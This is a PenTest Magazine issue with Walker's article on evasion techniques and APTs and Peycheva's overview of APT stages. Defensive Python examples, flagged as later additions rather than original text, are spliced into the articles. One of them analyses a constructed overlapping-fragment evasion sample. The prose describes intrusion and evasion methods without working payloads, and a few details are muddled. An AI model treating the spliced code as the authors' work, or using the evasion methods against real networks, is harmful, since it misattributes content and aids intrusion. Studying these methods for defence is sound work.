EDITORIAL TEAM

Managing Editor: Bartłomiej Adach, bartek.adach@pentestmag.com

Proofreaders & Betatesters: Lee McKenzie, Natalie Fahey, David Kosorok, Avi Benchimol, Tom Updegrove, Bernhard Waldecker, Girshel Chokhonelidze, Hammad Arshed, Matthew Sabin, Kevin Goosie, Ricardo Puga, Clancey McNeal, Ali Abdollahi, Craig Thornton.

Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their assistance there would not be a PenTest Magazine.

Senior Consultant/Publisher: Paweł Marciniak
CEO: Joanna Kretowicz, joanna.kretowicz@pentestmag.com
DTP: Bartłomiej Adach, bartek.adach@pentestmag.com
COVER DESIGN: Hiep Nguyen Duc
PUBLISHER: Hakin9 Media Sp. z o.o., 02-676 Warszawa, ul. Postępu 17D, Phone: 1 917 338 3631, www.pentestmag.com

All trademarks, trade names, or logos mentioned or used are the property of their respective owners. The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear PenTest Readers,

Another summer edition of our magazine is here, and it’s full of valuable infosec content. The two opening articles are related to the topic of Advanced Persistent Threats. Professor John Walker starts by presenting the interdependence of APTs and Advanced Evasion Techniques (AET). In the article he tries to answer the question of why Persistent Threats and Evasions will not see any decline any time soon. Mariana Peycheva, in turn, presents an analysis of Advanced Persistent Threats and their methodology, giving a great overview of the topic. As one of our reviewers said: “I wish that most business leaders and managers would read this”. Chris Cochran wrote a very interesting piece, which can be considered a guide for those building, executing, or consuming threat intelligence. Abhi Singh is the author of a thought leadership article on securing the API economy. It describes, at a high level, what kind of processes and architecture it would take to make a secure and resilient API ecosystem. Pal Patel provides the readers with a really interesting case study on the usage of the Right To Left Override technique. You should definitely check this article out and find out more about this interesting trick! Two of our regular contributors, Bohdan Ethics and Dinesh Sharma, provided new articles this month as well. Bohdan brought to the table a presentation of antivirus evasion basics. Dinesh presents the readers with different types of compliance audits, with a special angle on critical infrastructure. Ankit Giri emphasizes the significance of mobile exploit applications in his article, Vlad Martin points our attention to the way in which black hats are collecting personal data in the Commonwealth of Independent States member-countries, and, last but not least, David Evenden and Kent Potter present the Collegiate Cybersecurity Education Program that they developed together.

Special thanks to all of the contributors, reviewers, and proofreaders involved in the process of creating this issue. Without further ado, enjoy the content!

PenTest Magazine’s Editorial Team.

Contents

Long-Armed Persistence of Threats, Prof. John Walker, 4
Advanced Persistent Threats – Silent But Smart, Mariana Peycheva, 10
The Threat Intelligence EASY Button, Chris Cochran, 17
Securing the API Economy, Abhi Singh, 21
Right to Left Override (RTLO) Technique, Pal Patel, 31
Antivirus Evasion Basics, Bohdan Ethics, 35
Compliance Audit for Critical Infrastructure, Dinesh Sharma, 55
The Significance of Mobile Exploit Applications, Ankit Giri, 63
Black Hats: How They Are Collecting Personal Data in the CIS Countries, Vlad Martin, 69
How StandardUser Is Working with Practitioners and Universities to Close the Talent Gap, Kent Potter and David Evenden, 73

Long-Armed Persistence of Threats

Professor John Walker

22 years in Royal Air Force Security/Investigations and Counter Intelligence operations [Overt/Covert] service, working alongside GCHQ, CESG, UK and US Agencies, ITSO and Systems Security Manager for CIA Accredited Systems, Visiting Professor School of Science/Technology - Nottingham Trent University [NTU], Advisory Board, Research Centre in Cyber Security (KirCCS) at University of Kent, Mentor to Tallinn University (Estonia) Masters Students Cyber Research, Practicing and Registered Expert Witness, Certified Forensics Investigator Practitioner [CFIP], Editorial Member at MedCrave Research for Forensics & Criminology, ENISA CEI Listed Expert, Editorial Member of the Cyber Security Research Institute [CRSI], Digital Forensics/Cyber Security Listed Trainer at Meirc [Dubai] of Certified courses, and Fellow of Royal Society for the Arts [FRSA], writer for Apress Publishing New York, and a Belkasoft (Digital Forensics) Partner.

The time is now long past that dictates that a fresh way of delivering agile cyber-defense is a must-have, with the recognition that something, somewhere must change if we are to win the cyber-security race.
No matter what we deploy, and how we operate those commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on an every-day basis in some form – it may be that such encountered threats are passive, awaiting their time to go malevolent at their opportune moment; or active and already on a mission to avoid detection whilst delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined-up thinking, along with a recognition and guarantee that we have been or will be breached.

It was circa 2010/11 when I was approached by a Helsinki-based company – Stonesoft. Stonesoft wanted to discuss a new-angled threat vector which they referred to as the AET (Advanced Evasion Technique). I agreed to meet with them at the InfoSecurity show of the day in London, and approached the conversation with more than a little skepticism – could this be yet another over-hyped InfoSec term? Surrounded by the usual run-of-the-mill, mundane InfoSecurity talk of the day, which in that year was PCI-DSS and, of course, Penetration Testing, it would at least be refreshing to learn about something new. With doubt in my mind, the conversation progressed, and I was introduced to the new hypothesis of this AET thing. As the conversation proceeded with my introduction to the AET, the theoretical value started to gain traction, and I found myself being pulled from what I had considered a concept toward the fact that it was possibly a new threat vector with significant implications for insecurity. The basics of the AET were to evolve and utilize evasion techniques as a means to disguise and/or modify cyber-attacks passing through network connections, and thus to avoid detection by those deployed systems which were supposedly delivering protection to the corporation's valued assets.
The objective here was, of course, to achieve the successful delivery of hidden malicious content (payload), and the onward exploitation of a vulnerable target host – here seeing Network Security Devices that are designed to conduct real-time, deep-packet inspection of the network traffic rendered potentially ineffective, resulting in:

• Critical digital assets left unprotected
• A false sense of security born out of dependencies on supposedly secure, up-to-date commercial network defenses
• Organizations left not meeting their regulatory compliance requirements
• A higher success rate of encountered network attacks
• A shift in the Threat Landscape supporting opportunities of high reward (financial, strategic, political or technical) for the ‘advanced’ tech-savvy cyber-criminals

Given that, at the time of the AET threat first being made public, the Verizon Business 2010 Data Breach Investigations Report of the day stated that approximately 20% of incidents where malware had been discovered had an unknown component for the infection vector – which moves us down the road of Zero Days, a state which in 2019 has seen a significant leap forward in growth, combined with an increase in cross-platform threats – it may thus be reasonable to conclude that what was seen as a new threat in 2010/11 is now a threat vector with a close similarity to the Elephant in the Room!

The basis of the AET was simply to manipulate the IP Stack in such a way that the encountering IPS/IDS or firewalling technology would be confused by what its interface was seeing in the profile of a malformed stack, and thus, in theory, would take one of, or a combination of, five actions:

1. Block
2. Allow
3. Alert
4. Write to the Log
5. Not write to the Log

At the time of the AET being made public, there were 180+ stackable and combinable evasions being researched in a testing framework, meaning that these built up to a potential set of attack vectors which were concluded to be impossible to counter across all combinations without some form of automated evasion testing framework – without which, vendors were denied the opportunity to develop adequate anti-evasion capabilities and network defenses – a situation that gets worse when applied under IPv6, which offers a vastly expanded combination of a malevolent cyber-universe, as described by Stonesoft’s Harri Haanpää:

“Evasion techniques are a means to disguise and/or modify cyber-attacks to avoid detection and blocking by information security systems. They typically make use of rarely used protocol properties in unusual combinations and deliberate protocol violations. Such obfuscations may confuse the detection capabilities of intrusion prevention/detection systems.”

At the time of the early work into the AET, Jack Walsh, Program Manager at ICSA Labs, concluded that “Advanced Evasion Techniques can evade (and did) many network security systems.” He went on to comment: “We were able to validate Stonesoft’s research and believe that these Advanced Evasion Techniques can result in lost corporate assets with potentially serious consequences for breached organizations.”

To add to the weight behind what was then, and to a large extent still is, an ignored threat, Bob Walder, Research Director at Gartner, commented: “Recent research indicates that Advanced Evasion Techniques are real and credible – not to mention growing – a growing threat against the network security infrastructure that protects governments, commerce and information-sharing worldwide.
Network security vendors need to devote the research and resources to finding a solution.” – and yet at that time, and even today, the threats are still largely ignored, or should I say tolerated.

However, up to this point in time, I had only been listening to the theoretical description of the threat in this new ‘AET’ conversation, but I was interested enough to agree to work alongside Stonesoft, and visited their labs in Helsinki to see the pragmatic side of the conversation. On site, under their lab conditions, the highly skilled Stonesoft Team demonstrated testing of a variety of the latest-release, up-to-date firewalling products for their exposure to the AET threat, and the discoveries were astonishing, with results for all tested devices of:

• Bypass of the perimeter device to reach a supposedly protected asset
• Logs not being updated, or annotated with the wrong information

Upon returning from my visit, I was convinced that the new-age AET threat was real, and along with Stonesoft wrote a paper on the subject. However, as one always encounters in the Cyber Security Industry, that paper and the research of Stonesoft were challenged, with one of the most vocal critics being McAfee, who denounced the research outright – interestingly enough, notwithstanding their public opinion on the AET, McAfee acquired Stonesoft for $389 million in 2013 – I can only conclude that the paper and research they denounced must have struck a note which enticed them to put their hands in their pockets of denial!

On the associated subject of the APT (Active Persistent Threat), we can see the emergence of the AET into a new combined landscape of network dangers – dangers I have observed first hand inflicting breaches and compromises on the supposedly protected end-points, resulting in the bypass of firewalls, IDS, and IPS alike. However, it is here where we start to see the strain of ignored system updates taking their toll.
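The article describes the AET as a deliberately malformed stack that leaves an inspection device and the end host disagreeing about what was delivered. The following Python example, added here and not part of the original article or of Stonesoft's framework, makes that disagreement concrete for the classic case of overlapping IP fragments: it reassembles a constructed fragment set under two simplified policies (first fragment wins, last fragment wins) and reports whether they differ, along with the indicators an analyst or IDS rule would look for (conflicting overlaps, more than one "final" fragment, tiny non-final fragments). The fragment model, the two policies and the sample payloads are assumptions for illustration, not any vendor's actual reassembly behaviour.

```python
from dataclasses import dataclass


@dataclass
class Fragment:
    """One fragment of an IP datagram (constructed, simplified: byte offsets, no header)."""
    offset: int      # byte offset of this payload within the reassembled datagram
    payload: bytes
    more: bool       # the More Fragments flag: False marks the final fragment


def reassemble(frags, policy):
    """Reassemble fragments in arrival order.

    policy="first": an already-written byte is kept (first fragment wins).
    policy="last":  a later overlapping fragment overwrites it (last wins).
    Hosts and inspection devices differ in exactly this way, which is what an
    overlap-based evasion relies on; these two policies are a simplified model
    (an assumption of this example), not any specific product's behaviour.
    """
    buf = {}
    for frag in frags:
        for i, byte in enumerate(frag.payload):
            pos = frag.offset + i
            if policy == "first" and pos in buf:
                continue
            buf[pos] = byte
    if not buf:
        return b""
    length = max(buf) + 1
    if len(buf) != length:
        raise ValueError("gap in fragment set: datagram cannot be completed")
    return bytes(buf[i] for i in range(length))


def analyse(frags, min_nonfinal=8):
    """Reassemble under both policies and collect evasion indicators.

    Returns both reassemblies, whether they disagree ("ambiguous"), and a list
    of human-readable indicators. An inspection device that cannot tell which
    reassembly the real host will use should alert rather than guess.
    """
    indicators = []
    finals = [f for f in frags if not f.more]
    if len(finals) != 1:
        indicators.append(f"{len(finals)} fragments claim to be the final one")
    for f in frags:
        if f.more and len(f.payload) < min_nonfinal:
            indicators.append(f"tiny non-final fragment at offset {f.offset}")
    seen = {}
    for f in frags:
        for i, byte in enumerate(f.payload):
            pos = f.offset + i
            if pos in seen and seen[pos] != byte:
                indicators.append(f"conflicting overlap at byte {pos}")
                break
            seen.setdefault(pos, byte)
    first = reassemble(frags, "first")
    last = reassemble(frags, "last")
    return {"first": first, "last": last,
            "ambiguous": first != last, "indicators": indicators}


# Constructed sample: a clean two-fragment datagram, and the same datagram with
# a third, overlapping fragment arriving afterwards that rewrites bytes 6-7 and
# also claims to be the final fragment.
CLEAN = [Fragment(0, b"HELLO WO", True), Fragment(8, b"RLD!", False)]
EVASIVE = CLEAN + [Fragment(6, b"XXRLD!", False)]

if __name__ == "__main__":
    report = analyse(EVASIVE)
    print("first-wins:", report["first"])
    print("last-wins: ", report["last"])
    print("ambiguous: ", report["ambiguous"])
    for indicator in report["indicators"]:
        print(" -", indicator)
```

Run stand-alone, the evasive set reassembles to two different datagrams depending on the policy, which is the whole point: a device that silently picks one policy can be shown a harmless stream while the host receives the other.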
For example, the continued use of out-of-patch operating systems, like the seventeen-year-old Windows XP, which saw the massive and successful WannaCry attack on the NHS, which cost the taxpayer £92 million and resulted in the cancellation of over 19,000 appointments – some of which had real-world, life-affecting consequences. It is also still possible to see the old approach where internal systems are not maintained with an adequate security profile on the premise that they are hidden from the external interface that points to the dangerous outside world, and thus are not accommodated by Anti-Malware Protection, or, as I encountered at an Oil and Gas company, by any form of logging set against systems/folders storing critical data assets. In cases such as these, the AET and the APT are ideal partners, with the AET serving up the means by which to avoid detection and to deliver its payload (the APT), with the APT taking on the profile of, say, the Conficker agent, which is a great little bit of malware to create a shell condition on its vulnerable targeted system. From there, if the attacker is lucky enough, they will find other routine on-system tools such as the Windows Management Instrumentation Command-line (WMIC, wmic.exe), which offers a multitude of intelligence gathering and compromise opportunities. And then there are the much forgotten dangers from the world of DNS, which can leave a great big black hole open, in the style of a Cuckoo’s Egg attack, leveraging a Zone Transfer to quietly discover internal gems – which in one first-hand case concerning an East Midlands based Credit Reference Agency allowed the acquisition of a script containing a hard-coded User ID and the associated Password – and then, of course, onward potential for compromise!
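The zone transfer exposure mentioned above is usually a configuration oversight rather than a vulnerability. The Python script below is an added example, not code from the article or from any BIND tooling, that audits a BIND named.conf excerpt for zones whose allow-transfer list is missing or set to any. The constructed configuration shows the weak setting beside a restricted one; the comment-stripping, the brace matching and the rule that a zone with no ACL anywhere is reported as "unrestricted" are this example's own assumptions (a real server's default depends on its version and should be confirmed against its documentation).

```python
import re


def strip_comments(conf):
    """Remove BIND-style comments (/* */, //, #) so they cannot hide or fake directives."""
    conf = re.sub(r"/\*.*?\*/", "", conf, flags=re.S)
    conf = re.sub(r"(//|#).*", "", conf)
    return conf


def brace_block(text, start):
    """Return the body of the first {...} block at or after `start`, honouring nesting."""
    open_idx = text.index("{", start)
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    raise ValueError("unbalanced braces in configuration")


def transfer_acl(body):
    """Return the allow-transfer address-match list as tokens, or None if absent."""
    m = re.search(r"allow-transfer\s*\{([^}]*)\}", body)
    if m is None:
        return None
    return [t.strip() for t in m.group(1).split(";") if t.strip()]


def classify(acl):
    """Rate an ACL: no ACL at all is treated as unrestricted (conservative assumption)."""
    if acl is None:
        return "unrestricted"
    if any(t.lower() == "any" for t in acl):
        return "open"
    if all(t.lower() == "none" for t in acl):
        return "closed"
    return "restricted"


def audit_zone_transfers(conf):
    """Report the effective allow-transfer setting for every zone in a named.conf text."""
    conf = strip_comments(conf)
    default = None
    opt = re.search(r"(?m)^\s*options\s*\{", conf)
    if opt:
        default = transfer_acl(brace_block(conf, opt.start()))
    findings = []
    for zm in re.finditer(r'(?m)^\s*zone\s+"([^"]+)"', conf):
        acl = transfer_acl(brace_block(conf, zm.end()))
        if acl is not None:
            source = "zone"          # zone-level ACL overrides the global one
        elif default is not None:
            source, acl = "options", default
        else:
            source = "none"          # nothing configured anywhere
        findings.append({"zone": zm.group(1), "acl": acl,
                         "source": source, "status": classify(acl)})
    return findings


# Constructed named.conf excerpt (not a real deployment): one zone open to the
# world, one restricted to a secondary address and a TSIG key, one relying on
# whatever the server default happens to be.
SAMPLE_CONF = """
options {
    directory "/var/named";
    /* no global allow-transfer here */
};
zone "corp.example" IN {
    type master;
    file "corp.example.zone";
    allow-transfer { any; };   // weak: any client can pull the whole zone
};
zone "internal.example" IN {
    type master;
    file "internal.example.zone";
    allow-transfer { 192.0.2.53; key ns2-key; };
};
zone "legacy.example" IN {
    type master;
    file "legacy.example.zone";
};
"""

if __name__ == "__main__":
    for finding in audit_zone_transfers(SAMPLE_CONF):
        print(f"{finding['zone']:20} {finding['status']:12} via {finding['source']}: {finding['acl']}")
```

The fix for both flagged zones is the same as the restricted example: list only the secondaries (by address or TSIG key) in allow-transfer, or set a global allow-transfer in the options block so that newly added zones inherit a safe default.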
Having started off circa 2010, we now move into the year 2019, in which we still see the risks and attack vectors of the AET and APT at an all-time high, and this against a backdrop of a higher-than-ever spend on security, alongside the associated growth in complexity of a cyber-dependent, always-connected business and social society – a world in which, according to McAfee some years back, they were winning the Cyber-Security Race – I think not!

The time is here where we need to ask the right questions about our level of deployed defenses, starting with those shown in the image below:

[Image: “Do evasions pose a threat to us (or not)?”, showing three areas: 1. Security Level Evaluation (audits of existing security devices); 2. New Product Evaluation (for investment decisions); 3. Redesigning network security. Questions posed: Have we evaluated security risks correctly, and are we managing these risks? Which product offers the highest protection against evasions? How can I verify vendor claims? Is our security level high enough? Where to place or relocate IPS/deep packet inspection devices? And what kind?]

So, where are we today? Evidenced by the long list of breached and compromised organizations who have invested small fortunes and placed their ultimate trust in commercial devices and staff to defend their technology-kingdoms, one may only conclude that Persistent Threats and Evasions are not seeing any demise soon, and the question must be asked: what is going wrong? Is it that:

• The reliance on the over-priced commercial promise of the Silver Bullet security device, with over-expectation of its actual capabilities to defend the network, is flawed?
• We have gone so far down the long path of the Tick-Box Compliance-led security approach that we have parted company with the bits-and-bobs of technical security skills?
• The Skills Gap issue in the Cyber Space is now hitting its mark with an adverse effect?
• Under-maintained, over-exposed assets residing on the network add to the conundrum of insecurity?
• Or finally, as with the combination of an AET with the APT, is it that the aforementioned all have their own part to play in a world that will assure the Persistent Threats will continue to evolve and bite!

Looking back over the years from 2010 right up to 2019, what is so very interesting is that the only thing that has changed is that the situation of insecurity has become far worse, in a world in which Persistent Threats are ever present, and being leveraged by a range of adversarial actors, from those with quick-win monetary gain in mind, to the state-sponsored activities of the geopolitical aggressors, not to mention the groups of commercially motivated serious and organized crime gangs. Thus, the time is now long past that dictates that a fresh way of delivering agile cyber-defense is a must-have, with the recognition that something, somewhere must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on an every-day basis in some form – it may be that such encountered threats are passive, awaiting their time to go malevolent at their opportune moment; or active and already on a mission to avoid detection whilst delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined-up thinking, along with a recognition and guarantee that we have been or will be breached. We must start to evolve the mindset of deployed states of readiness that are associated with the recognition that the proactive defenses may be (are) flawed, and take up a robust posture on the reactive side of ‘Response’ to underpin structured engagements and recovery from the most adverse of anticipated known-unknown conditions of the Persistent Threat.
Above all, we must deploy our infrastructures from the ground up in a well-formed, well-documented and potentially segmented way, to take into account that the Persistent Threats will be seeking to leverage and exploit any one of many combinations of exposure opportunities to deliver their show-stopping payload!

Advanced Persistent Threats – Silent But Smart

Mariana Peycheva

Mariana Peycheva is CSO for the Unified Communications and Collaboration division of Atos.

According to a study by ISACA, phishing is the most common way of launching an APT, as it gives the attacker an opportunity to gain initial access to the organization, and considering the human factor as one of the biggest vulnerabilities makes the defense mechanism against initial attacks very difficult to design. It was evident from the study that 53.4% of the people believe APT is not much different from traditional attacking methods. However, 93.9% of the people agreed that APTs pose a significant threat to national security and economic stability. Among the critical findings in this survey paper are that 63% of the people believe that it’s just a matter of time before their organization becomes a victim of an APT attack, while only 60% believe that they are capable enough to stop such an attack.

Introduction

The term Advanced Persistent Threats, or APT, entered the general terminology of the information security profession in mid-January 2010, when Google announced that its intellectual property had been the victim of a targeted attack originating in China. Google is not the only one; more than 30 other technology companies, military contractors and large enterprises have been hacked by attackers who used a suite of social engineering, targeted malware, and surveillance technologies to secretly gain access to piles of sensitive corporate data [1].
Google's public acknowledgement raised the issue of targeted long-term attacks by well-prepared attackers seeking access to corporate property and military information. It also launched a series of vendors promoting promising anti-APT products and services that only obscure the issue for security managers and activity managers [1].

The US Air Force coined the phrase Advanced Persistent Threat in 2006, as their teams needed to communicate with partners in the unclassified public administration world. People from the Department of Defense usually give classified names to specific threats and attackers and use them to describe the activities of the participants in those threats. If the Air Force wanted to talk about some intrusion with other personnel, they would not be able to use the classified name of the threat actor. Therefore, they coined the term APT as an unclassified nickname [1]. In the early days, such attacks were aimed at government or financial organizations, but now the domain is much larger.

APTs refer to specific threat actors; APTs do not refer to vague and shady internet powers. The term is most commonly applied to various groups operating in the Asia-Pacific region. Those who are familiar with APT activities may have an honest dispute about whether the term should be used to refer only to some participants in the Asia-Pacific region [1] or whether it can be expanded into a general classifier. In other words, if criminals from Eastern Europe work using the same tools, tactics, and procedures as traditional APTs, will these actors also bear the APT label? The answer to this question depends on the person asking it. An IT security specialist in a private organization will usually not be interested in whether the threat actors attacking the company are from Asia and the Pacific or Eastern Europe.
The reason is that they perform the same defensive actions regardless of the location or nationality of the opponent. However, anyone with legal and/or national security responsibility who implements diplomatic, intelligence, military or economic measures will undoubtedly want to determine the origin of an attack [1].

For a long time there was no clear understanding of what APT is. Several factors contributed to the overall sense of confusion:

• With no details to discuss, the security community turned to just about anyone ready to talk about the incident. In too many cases, speakers turned out to be vendors who saw APT as a marketing opportunity to recover fast-falling security spending [1].
• Many analysts are strictly focused on the elements of the incident that they understand best, irrespective of the true nature of the event [1]. Companies that specialize in botnet research assume that botnets were involved; others focus on vulnerability identification and exploit development. Unfortunately, botnets have nothing to do with APT, and vulnerabilities, exploits, and malware are just elements of APT incidents, not their core functions.
• Impact of APT – economic advantages, strategic benefits, stealing sensitive information; the goals can be political, such as undermining internal stability, or economic, based on the theft of victims' intellectual property. Logically there are technical objectives that extend the ability to complete the mission. These include gaining access to source code to develop exploits further, or to study the workings of security products in order to defeat or break them. The most worrying thing is that attackers can make changes to improve their positions and weaken the victim [1].

Analysts rate APT activities as having four main goals and describe the enemy as follows. Advanced means that opponents can act across the spectrum of a computer attack.
They can use the most trivial, easily accessible exploits against well-known vulnerabilities, or elevate their game to researching new vulnerabilities and developing specific exploitation methods that depend on the situation of the target. Persistent means that the enemy has the specific task of completing their mission. These are not casual attackers. They receive directives from their bosses in the same way as an intelligence group. Being persistent does not necessarily mean that they are continually executing malicious code on victims' computers [1]. Instead, they maintain the level of engagement necessary to fulfill their purpose. Threat means that the opponent is not a piece of meaningless code. It is a threat that is organized, funded, and motivated. Some people talk about many "groups" consisting of specialized "crews" with a variety of missions [1].

The traditional attack is usually performed by one person: aggressive, very rapid, smash and grab, a tactic based on a minimal time window. An APT, by contrast, involves repeated attempts using several methods, a stealthy approach that adapts to resist defenses, very slow so as to avoid any suspicion, and may involve sleep modes before commencing any attack [2].

As already mentioned, there are cyber espionage groups associated with various APT attacks. In 2018, Trend Micro security researchers reported an attack using Android malware matching Bahamut’s code (a Mobile Device Management (MDM) tool detected in a campaign targeting iPhone devices in India), but which connects to its own command and control (C&C) infrastructure. Some of these C&Cs, which also act as phishing sites, attempt to lure users into downloading malicious applications via links to Google Play. Such applications and code can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, steal files with specific extensions, and even steal screenshots of messages.
In short, APT is an adversary who performs bold operations (called computer network operations) to maintain information about the status of their goals. APT is characterized by its persistence in maintaining some degree of control over the target's computer infrastructure, acting continuously to preserve or restore control and access. At informal counterintelligence and military meetings, analysts use the term "aggressive" to emphasize the extent to which APT pursues its goals against various governmental, military, and private targets.

Let’s take a deeper look at the APT methodology. The APT attack is based on four or five stages, but generally it can be summarized as breaking in, scanning the network, identifying the target, making it accessible to accomplish the goal, and escaping the network without leaving any trace or evidence [2].

1. Reconnaissance – at stage one, the attacker can use different techniques like social engineering, open-source intelligence tools (OSINT) or approaching an organization which sells data or information about multinational firms. This step aims to know the target and gather as much information as possible about it. As there are countless ways to conduct the initial step of infiltrating, defining a security baseline or a model to stop the initial attack is quite a challenge. Having in mind the persistent approach of an APT, it is only a matter of time before an attacker finds a backdoor in the security mechanism [2].
2. Breaking in – at stage two, we can expect that the attacker will exploit the weakness and gain access to the target network. They can use an indirect approach such as spear phishing, a watering hole attack, or a zero-day virus to infiltrate and deploy a remote access tool for further activities.
A common approach is the use of email combined with social engineering: a targeted user receives a link in an email from a trusted person or source, bringing the user to a linked website which contains a malicious JavaScript payload, which the browser downloads and executes. They can simply send an attachment in an email purporting to come from a reliable source, or use an infected USB device which, when attached to a Windows-based system, will auto-execute malware without user interaction by utilizing a zero-day vulnerability. A different approach, defined as direct, is easy to understand: the attacker compromises any third party working at the organization and uses their privileges to gain access to any system or server [2].
3. Identifying the target – as the name suggests, in this stage the attacker searches for and identifies the target data. The chances of being caught are quite high, as the attacker will be scanning the network for its target, and this could result in abnormal traffic behavior, trespassing on data files, or access violations on the network [2].
4. Making it accessible – if the attacker succeeds in identifying the targets, they have to make them accessible or acquire the appropriate rights to access that data. Rootkits can also be secretly installed on targeted systems and network access points to monitor or capture data and commands as they stream over the network. The captured information can be used to give the intruders the information they need to plan future attacks or to make the target data accessible. At this stage, being persistent is a key feature for stealing the information [2].
5. Fleeing the network – finally, the attacker will try to escape and cover their tracks, so that it becomes more challenging to identify the attacker and to detect the damage done. In some cases, the attacker uses the APT to gain long-term access or to drop a back door so that the network can be accessed whenever required [2].

APT is an approach based on phases.
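Stage three above is the one the article calls out as detectable: a scan of the internal network shows up as abnormal traffic. The following Python example, added here and not part of the article or of any product it mentions, runs a simple sliding-window detector over a constructed flow log (timestamp, source, destination, destination port, protocol) and flags a source that sweeps many hosts on one port (horizontal) or many ports on one host (vertical). The record format, the window and the thresholds are assumptions chosen for the illustration; in production they would be tuned against a baseline of normal traffic to keep false positives from backup servers, vulnerability scanners and the like in check.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def parse_flow(line):
    """Parse one constructed flow record: '<ISO time> <src> <dst> <dport> <proto>'."""
    ts, src, dst, dport, proto = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), proto


def detect_scans(lines, window_s=60, host_threshold=10, port_threshold=15):
    """Flag sources that touch many hosts (horizontal sweep) or many ports on one
    host (vertical probe) inside a sliding time window. At most one alert per source."""
    flows = sorted((parse_flow(line) for line in lines), key=lambda f: f[0])
    by_src = defaultdict(list)
    for f in flows:
        by_src[f[1]].append(f)
    alerts = []
    for src, fl in by_src.items():
        start = 0
        for end in range(len(fl)):
            # slide the window start forward until it is within window_s of this flow
            while (fl[end][0] - fl[start][0]) > timedelta(seconds=window_s):
                start += 1
            window = fl[start:end + 1]
            hosts = {f[2] for f in window}
            ports_per_host = defaultdict(set)
            for f in window:
                ports_per_host[f[2]].add(f[3])
            if len(hosts) >= host_threshold:
                alerts.append({"src": src, "kind": "horizontal",
                               "count": len(hosts), "at": fl[end][0].isoformat()})
                break
            busiest = max(len(p) for p in ports_per_host.values())
            if busiest >= port_threshold:
                alerts.append({"src": src, "kind": "vertical",
                               "count": busiest, "at": fl[end][0].isoformat()})
                break
    return alerts


def constructed_flows():
    """Build a small constructed flow log: one sweep, one port probe, one normal host."""
    base = datetime(2019, 7, 1, 9, 0, 0)
    lines = []
    for i in range(12):   # 10.0.0.5 touches 12 hosts on port 445 within 24 seconds
        t = base + timedelta(seconds=2 * i)
        lines.append(f"{t.isoformat()} 10.0.0.5 10.0.1.{10 + i} 445 tcp")
    for i in range(20):   # 10.0.0.7 probes 20 ports on one server within 20 seconds
        t = base + timedelta(minutes=5, seconds=i)
        lines.append(f"{t.isoformat()} 10.0.0.7 10.0.1.50 {1000 + i} tcp")
    for i, port in enumerate((443, 445, 389)):   # 10.0.0.9: ordinary traffic, spread out
        t = base + timedelta(minutes=10 * i)
        lines.append(f"{t.isoformat()} 10.0.0.9 10.0.1.{60 + i} {port} tcp")
    return lines


SAMPLE_FLOWS = constructed_flows()

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_FLOWS):
        print(f"{alert['at']} {alert['src']} {alert['kind']} scan ({alert['count']} distinct)")
```

Only the two scanning hosts produce alerts; the third host's three connections over twenty minutes never fill the window. Because an APT operator deliberately moves slowly, the same logic is worth running a second time with a much longer window and higher thresholds to catch a sweep spread over hours or days.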
An APT usually has three to four stages, and most organizations are not even aware that an APT attack has happened on their network [2].

How to protect from APT?

This is not a simple attack, but one that is logically designed and composed of numerous hacking tools and processes following a sophisticated pattern to achieve its objective. The victim is “inspected” constantly over a long period. The attackers are not “Script Kiddies” but possess a high level of knowledge and plenty of resources, so we should not expect a simple solution. Many of the “classic” security tools are unable to manage this purposeful and carefully prepared attack. For example, when using software that may be untrustworthy, it is essential to run it in a sandboxed area so that other software, files, and applications are not compromised [3]. If no adverse actions are detected after a while, then it is assumed that the code is safe, and it is allowed to execute. But malware developers are smart, and they can bypass this detection technique by having their code sit dormant for days or even weeks before activating and wreaking havoc.

To react to this threat we must first discover and analyze it. Network traffic analysis, which follows the traffic and the applications, is one of the necessary components in a layered defense design. Ideally, there will be an engine that identifies malware and activities signaling an attempted attack. Detection intelligence can aid your rapid response.

Email security is a highly escalated topic nowadays. Different advanced malware detection techniques identify and block spear-phishing emails. As we saw from the example structure of the attack, phishing is the initial phase of most targeted attacks. Such techniques can discover malicious content, attachments, and URL links that pass unnoticed through standard email security.
Endpoint security – monitoring that records and reports detailed system activities to allow threat analysts to assess the nature and extent of an attack rapidly – is also a mandatory part of a sophisticated defense. Most forms of malware and advanced persistent threats enter the enterprise through vulnerable endpoints [4]. Detecting malware based on file signatures or blacklisting has proven to be a very inefficient technique in the fight against APT. Following customer needs, security vendors have started to take radically new approaches to combating malware and APTs. For example, Trend Micro Deep Discovery solutions for network, email, endpoint, and integrated protection provide advanced threat protection [5]. It was designed as a management solution that helps large enterprise and government organizations. It provides network-wide visibility, a significant control needed in this kind of protection; detection engines focused on identifying advanced malware and human attackers; a real-time dashboard presenting the in-depth analysis and actionable intelligence required to prevent, discover, and contain attacks against corporate data; and a console providing real-time threat visibility and detailed scrutiny in an intuitive multi-level format. Thereafter, security professionals can focus on risks and deep forensic analysis, and rapidly implement containment and remediation procedures [6].

Trend Micro is not the only vendor to focus their attention on APT. McAfee claims that their Advanced Threat Defense combines in-depth static code analysis, dynamic analysis (malware sandboxing), and machine learning to increase zero-day threat detection, including threats that use evasion techniques and ransomware, which allows us to uncover hidden risks.
Alongside the threat intelligence sharing option, which makes possible the immediate sharing of threat intelligence across the entire infrastructure, the solution supports offline analysis options, and advanced features enable security operations centers to validate threats. The centralized analysis covers multiple protocols and recommended products, including email gateways. Surely, going through different vendors, we will find that most of them provide sophisticated solutions which can support security professionals in their efforts against APT.

